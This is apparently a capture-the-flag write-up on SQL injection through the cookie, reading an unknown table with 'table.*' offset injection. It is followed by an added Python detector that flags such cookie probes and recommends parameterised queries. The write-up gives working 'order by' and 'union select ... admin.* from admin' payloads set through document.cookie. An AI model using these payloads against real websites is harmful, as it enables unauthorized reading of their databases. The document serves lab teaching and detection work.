Offset injection (other databases are also available)
Principle: During SQL injection you sometimes cannot query column names, for example when the account lacks permission to read the system's own database (the schema tables). When you have guessed the table name but cannot guess the field names, offset injection lets you read the data in that table by selecting table_name.* instead. Because it is a wildcard, it returns every column of the table, but there is a length limit: if the injected query has fewer columns than the target table, the technique cannot be used.
First question:
We first check whether the URL bar offers an injection point.
Clearly it does not, so we try cookie injection instead:
press F12 to open the console, delete the GET parameter from the URL bar, and enter the following in the console
document.cookie="id="+escape("171")
It executes,
so we continue by checking the number of fields
document.cookie="id="+escape("171 order by 10")
But with
document.cookie="id="+escape("171 order by 11")
no data is returned, so the query has 10 fields.
Next we enter
document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")
The output points are 2, 7, 8 and 9.
We enumerated the table name and
obtained one table name, admin,
but found that the field names could not be obtained one by one, so we looked at other pages to see whether
any had more fields. There is a page with 26 fields
document.cookie="id="+escape("105 order by 26")
Enter
document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin")
The output points are 3, 5 and 7,
so we substitute admin.*
document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin")
…
document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin")
Finally, admin turns out to have 16 fields.
Since the output points are 3, 5
and 7, we move admin.* to position 3
document.cookie="id="+escape("105 union select 1,2,admin.*,4,5,6,7,8,9,10,11 from admin")
However, this only outputs the first 7 fields' data and cannot show the rest. No flag appears in those first 7, so we check whether the HTML contains a hidden output point.
Sure enough, there is one. We then check the data of the next few fields for a flag,
trying them one by one, and find the flag
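As an added defender-side example (not part of the original writeup), the detection logic below scans Cookie header values for the probe shapes used above: "order by N" column counting and a "union select" list that contains a table.* wildcard, which is the signature of an offset injection. The client addresses and log entries are constructed, and the decoder assumes the browser escape() percent-encoding seen above.

```python
import re
from urllib.parse import unquote

# Constructed sample log entries (client address, raw Cookie header),
# modelled on the probes in the writeup. Not real traffic.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "id=171"),
    ("10.0.0.5", "id=171%20order%20by%2010"),
    ("10.0.0.5", "id=171%20order%20by%2011"),
    ("10.0.0.5", "id=171%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin"),
    ("10.0.0.5", "id=105%20union%20select%201,2,admin.*,4,5,6,7,8,9,10,11%20from%20admin"),
    ("10.0.0.9", "id=42; session=abc123"),
]

ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
# Capture the column list and the table name of a UNION SELECT.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+?)\s+from\s+([A-Za-z_][\w.]*)", re.I)
WILDCARD = re.compile(r"([A-Za-z_]\w*)\.\*")


def classify_cookie(cookie_header: str) -> list[dict]:
    """Return one finding per suspicious cookie value in a raw Cookie header."""
    findings = []
    for part in cookie_header.split(";"):
        name, _, raw = part.strip().partition("=")
        # unquote() reverses the %XX encoding that escape() produces for ASCII.
        value = re.sub(r"\s+", " ", unquote(raw)).strip()
        m = ORDER_BY.search(value)
        if m:  # attacker counting columns, as in "171 order by 10"
            findings.append({"cookie": name, "kind": "column_count_probe", "columns": int(m.group(1))})
        m = UNION_SELECT.search(value)
        if m:
            items = [s.strip() for s in m.group(1).split(",")]
            finding = {"cookie": name, "kind": "union_select", "columns": len(items), "table": m.group(2)}
            # A table.* entry among numeric placeholders is the offset-injection shape.
            wild = [(pos, WILDCARD.fullmatch(s)) for pos, s in enumerate(items, 1) if WILDCARD.fullmatch(s)]
            if wild:
                finding["kind"] = "offset_injection"
                finding["wildcard_position"] = wild[0][0]
                finding["wildcard_table"] = wild[0][1].group(1)
            findings.append(finding)
    return findings


def scan(requests):
    """Flatten findings over (client, cookie) pairs for triage or alerting."""
    return [(client, f) for client, cookie in requests for f in classify_cookie(cookie)]
```

Blocking on these patterns alone is not a fix; the durable mitigation is to bind the cookie value as a query parameter instead of concatenating it into SQL.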